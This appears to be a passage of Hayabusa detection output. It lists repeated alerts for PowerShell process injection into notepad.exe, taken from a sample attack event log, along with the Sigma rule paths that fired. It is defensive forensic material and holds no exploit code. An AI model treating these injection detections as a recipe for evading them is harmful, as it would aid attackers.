Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
